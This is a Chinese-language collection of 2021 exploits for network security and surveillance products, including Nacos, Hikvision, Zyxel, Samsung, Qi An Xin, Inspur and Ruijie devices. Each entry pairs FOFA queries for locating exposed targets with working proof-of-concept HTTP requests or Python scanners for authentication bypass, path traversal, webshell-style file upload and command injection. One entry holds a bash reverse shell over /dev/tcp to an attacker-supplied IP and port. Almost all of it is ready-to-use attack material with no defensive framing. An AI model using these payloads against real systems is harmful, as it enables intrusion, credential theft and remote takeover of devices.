2021年网络安全设备漏洞集合_360天擎文件上传漏洞

360天擎SQL注入漏洞

描述

fofa title="360新天擎"

POC & 利用

/api/dp/rptsvcsyncpoint?ccid=1

360天擎信息泄露

描述

/api/dbstat/gettablessize

POC & 利用

Alibaba 阿里巴巴Nacos认证绕过

描述

fofa：title="Nacos"

POC & EXP

# 添加用户
POST /nacos/v1/auth/users HTTP/1.1
Host: 127.0.0.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
username=aaaa&password=bbbb

# 查看用户
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 127.0.0.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

D-Link DCS系列监控账号密码信息泄露

描述

fofa搜：app="D_Link-DCS-2530L"
拼接路径：/config/getuser?index=0

利用

HIKVISION 海康威视流媒体管理服务器 后台任意读取

描述

通过文件遍历漏洞获取敏感信息

POC & EXP

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

Kyan 网络监控设备账号密码泄露漏洞

描述

fofa title="platform - Login"

POC & EXP

访问url，http://127.0.0.1/hosts ，显示用户名密码

Zyxel NBG2105 合勤科技路由器身份验证绕过

描述

Zyxel NBG2105 存在身份验证绕过，攻击者通过更改 login参数可用实现后台登陆 影响版本：Zyxel NBG2105 fofa app="ZyXEL-NBG2105"

POC & EXP

# python3
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
 
def poc(url):
    exp = url + "/login_ok.htm"
 
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cookie":"login=1",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=exp, headers=header, verify=False,timeout=10)
        #print(response.text)
        if response.status_code == 200 and "GMT" in response.text:
            print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞！！！")
            print("数据信息如下：")
            print(response.text)
        else:
            print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞！！！")
    except Exception as e:
        print(exp + "请求失败！！")
 
 
def main():
    url = str(input("请输入目标url："))
    poc(url)
 
 
if __name__ == "__main__":
    main()

三星 WLAN AP WEA453e路由器远程命令执行漏洞

描述

WLAN AP WEA453e路由器 存在远程命令执行漏洞，可在未授权的情况下执行任意命令获取服务器权限 fofa title=="Samsung WLAN AP"

POC & EXP

# 请求包
POST /(download)/tmp/a.txt HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Content-Length: 0
 
command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
 

和信创天云桌面文件上传漏洞

描述

存在某接口可被攻击者利用上传文件

利用

上传

POST /Upload/upload_file.php?l=test HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 183
 
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/avif
 
<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--

访问

http://xxx.xx.xxx.xxx/Upload/test/test.php

奇安信 网康下一代防火墙远程命令执行漏洞

描述

fofa app="网康科技-下一代防火墙"

利用

利用jar包： https://github.com/Yang0615777/PocList/blob/main/QiAnXin-WangKangFirewall-RCE.jar

POC

POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d6o8gdugrhmvf2sq18ojhj50p3; ys-active_page=s%3A
Content-Length: 178
 
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

然后访问：/test_test.txt

安天追影威胁分析系统越权访问漏洞

描述

通过修改返回包内容，可以绕过验证，直接登陆系统，可以查看到部分敏感信息

POC & EXP

• 访问威胁分析系统，抓包一条"/api/user/islogin"的请求，返回包的内容为
  {"role": "", "login_status": false, "result": "ok"}
• 把请求中的 login_status 改为 true
• 再次访问首页成功进入页面

朗视 TG GSM ⽹关目录遍历漏洞

描述

朗视 TG GSM ⽹关存在⽬录遍历漏洞

POC & EXP

# 获取固件解密密码
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
 
# 查看/etc/passwd：
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

浪潮 ClusterEngineV4.0 任意命令执行漏洞

描述

登录处抓包，然后闭合username字段重发引发报错 fofa title="TSCEV4.0"

POC & 利用

# POC测试(出现 root:x:0:0 则存在漏洞)
 
op=login&username=peiqi`$(cat /etc/passwd)`
{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user peiqi does not exist\nerror:1\n"}
 
# 反弹shell
op=login&username=peiqi`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`

锐捷RG-UAC统一上网行为管理审计系统信息泄露

描述

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 fofa title="RG-UAC登录页面" && body="admin"

POC & EXP

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
def title():
    print('+------------------------------------------')
    print('+  \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mFile >>> ip.txt\033[0m')
    print('+------------------------------------------')
 
def POC_1(target_url):
    vuln_url = target_url
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
    except Exception as e:
        print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
 
def Scan(file_name):
    with open(file_name, "r", encoding='utf8') as scan_url:
        for url in scan_url:
            if url[:4] != "http":
                url = "http://" + url
            url = url.strip('\n')
            try:
                POC_1(url)
 
            except Exception as e:
                print("\033[31m[x] 请求报错 \033[0m".format(e))
                continue
 
if __name__ == '__main__':
    title()
    file_name  = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
    Scan(file_name)

齐治堡垒机任意用户登录

描述

齐治堡垒机某版本任意用户登录.md fofa app="齐治科技-堡垒机"

POC & EXP

import requests,sys,re,urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# for url in  open("C:/1.txt","r"):
if len(sys.argv)<2:
        print("[+]Use: pyhton3 齐治科技-堡垒机.py http://ip:port")
        print("[+]Explain: HADESI")
        print("[+]============================")
        sys.exit()
 
url=sys.argv[1]
url1=url+"/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
 
res = requests.get(url=url1,verify=False)
# print (res.status_code)
if res.status_code == 200 :
    print(url1+">>>>>漏洞存在")